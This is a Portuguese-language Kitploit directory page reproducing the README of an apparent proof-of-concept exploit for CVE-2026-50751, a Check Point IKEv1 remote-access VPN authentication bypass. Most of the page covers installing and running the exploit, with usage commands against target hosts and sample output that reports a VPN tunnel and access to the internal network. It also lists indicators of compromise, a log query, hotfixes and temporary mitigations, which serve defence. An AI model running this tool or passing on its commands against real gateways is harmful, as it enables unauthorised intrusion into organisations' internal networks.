Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/fevar54/cve-2026-50751---check-point-ikev1-authentication-bypass-exploit
Autenticação e AutorizaçãoScanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoSegurança de RedeTestes de Penetração
GitHubfevar54/cve-2026-50751---check-point-ikev1-authentication-bypass-exploit

CVE-2026-50751---Check-Point-IKEv1-Authentication-Bypass-Exploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Vulnerabilidade: Fraqueza no fluxo lógico em Remote Access e Mobile Access

Ver Repositório
137há 3 mesesAinda não revisado

CVE-2026-50751 - Check Point IKEv1 Authentication Bypass Exploit

Security Rating CVSS CISA KEV License Python

⚠️ AVISO IMPORTANTE

Este código é APENAS para fins educacionais e testes de segurança autorizados. O uso não autorizado contra sistemas sem permissão explícita é ILEGAL. O autor não se responsabiliza pelo uso indevido desta ferramenta.

📋 Descrição

CVE-2026-50751 é uma vulnerabilidade crítica de bypass de autenticação no protocolo IKEv1 (obsoleto) da Check Point, que afeta o Remote Access VPN e o Mobile Access. Um atacante não autenticado pode explorar uma falha na validação de certificados para estabelecer uma conexão VPN sem a necessidade de uma senha válida.

Detalhes Técnicos

  • Tipo: Bypass de Autenticação (CWE-287)
  • Score CVSS: 9.3 (Crítico)
  • Vetor: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
  • Exploração ativa: Sim (desde 2026-05-07)
  • CISA KEV: Adicionado em 2026-06-08, Prazo 2026-06-11

🎯 Versões Afetadas

ProdutoVersões
Security GatewaysR80.40 - R82.10 com IKEv1 habilitado
Spark FirewallsR80.20.X, R81.10.X, R82.00.X
Mobile AccessTodas as versões com IKEv1

Condições Requeridas

  • ✅ VPN Remote Access ou Mobile Access habilitado
  • ✅ IKEv1 habilitado para acesso remoto
  • ✅ Gateway aceita clientes legados de Remote Access
  • ✅ Não requer machine certificate

🔧 Instalação

root@kitploit:~
# Clonar repositorio
git clone https://github.com/username/CVE-2026-50751-PoC
cd CVE-2026-50751-PoC

# Instalar dependencias
pip install -r requirements.txt

# Dar permisos de ejecución
chmod +x exploit.py

📦 Dependências

root@kitploit:~
cryptography>=41.0.0
scapy>=2.5.0

🚀 Uso

Escaneamento de detecção

root@kitploit:~
# Detectar si IKEv1 está habilitado
python3 detector.py -t 192.168.1.1 -p 500

# Escaneo rápido
python3 detector.py -t vpn.target.com -p 4500

Exploração (SOMENTE USO AUTORIZADO)

root@kitploit:~
# Ejecutar bypass de autenticación
python3 exploit.py -t 192.168.1.1 -p 500

# Con interfaz específica
python3 exploit.py -t vpn.target.com --interface eth0

# Modo verbose
python3 exploit.py -t 192.168.1.1 -p 500 -v

Saída esperada

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║  CVE-2026-50751 - Check Point IKEv1 Authentication Bypass   ║
║  Critical VPN Authentication Bypass Exploit                 ║
║  CVSS: 9.3 | CISA KEV: 2026-06-08                          ║
╚═══════════════════════════════════════════════════════════════╝

[1] Initiating IKEv1 Main Mode...
[+] Received response - SPI: a1b2c3d4e5f67890
[2] Sending crafted KE + NONCE payloads...
[+] Gateway accepted crafted KE/NONCE - Vulnerability triggered!
[3] Calculating authentication keys...
[4] Sending spoofed authentication...
[+] SUCCESS! Authentication bypassed!
[+] Established IKE SA without valid credentials
[5] Establishing VPN tunnel...
[+] VPN tunnel established!
[+] Internal network access available

[✓] EXPLOIT SUCCESSFUL
[✓] Authentication bypass achieved
[✓] VPN tunnel established
[!] System is VULNERABLE - Apply hotfix immediately

🔍 Detecção de Comprometimento

Pesquisar nos logs do SmartConsole

root@kitploit:~
# Query para detectar atacantes
action:"Key Install" AND (src:45.77.149.152 OR dst:45.77.149.152)

IOCs Conhecidos

| Tipo | Valor | | IPs atacantes | 45.77.149.152, 209.182.225.136, 38.60.157.139, 162.33.177.101, 45.76.26.42, 144.208.127.155, 38.54.88.201, 38.54.107.167, 66.42.99.200, 45.63.104.106, 45.61.136.173 | | Hashes | 52fda5c1b9704544f32ee98d9060e689, 51d39aa39478beeac94f2d12f682ecce |

🛡️ Mitigação

Opção 1 - Aplicar Hotfix (RECOMENDADO)

| Versão | Hotfix Take | Link | | R82.10 | Take 19 | Baixar | | R82 | Take 103 | Baixar | | R81.20 | Take 141 | Baixar |

Opção 2 - Mitigações Temporárias

Desabilitar clientes legados:

SmartConsole → Gateway → VPN Clients → Authentication

Desmarcar "Allow older clients"

Forçar somente IKEv2:

Global Properties → Remote Access → VPN Authentication

Selecionar "IKEv2 only"

Tornar obrigatório o Machine Certificate:

VPN Clients → Authentication → Machine Certificate Authentication

Definir como "Mandatory"

📚 Referências

NVD - CVE-2026-50751

Check Point SK185033

CISA Known Exploited Vulnerabilities

Post do Blog - Check Point Research

📊 Linha do Tempo

| Data | Evento | | 2026-05-07 | Primeira exploração observada | | 2026-06-04 | Check Point inicia investigação | | 2026-06-08 | CVE publicado, CISA adiciona ao KEV | | 2026-06-11 | Prazo da CISA para aplicar o patch |

⚖️ Aviso Legal

Este software é fornecido "como está", sem garantias de qualquer tipo. O autor não é responsável pelo uso indevido desta ferramenta. Use-a apenas em sistemas que você possua ou para os quais tenha autorização explícita para testar.

📞 Contato

Para relatar bugs ou contribuir:

Abrir uma issue no GitHub

Contato: [email protected]

🌟 Créditos

Check Point Research - Pela descoberta e análise

CISA - Pela coordenação e divulgação

Comunidade de segurança - Pela resposta rápida

⭐ Se este PoC foi útil para você, considere dar uma estrela ao repositório

text

📄 LICENÇA (GPLv3)

📦 requirements.txt txt cryptography>=41.0.0 scapy>=2.5.0 colorama>=0.4.6

⚠️ Nota importante para o GitHub:

Baixar ferramenta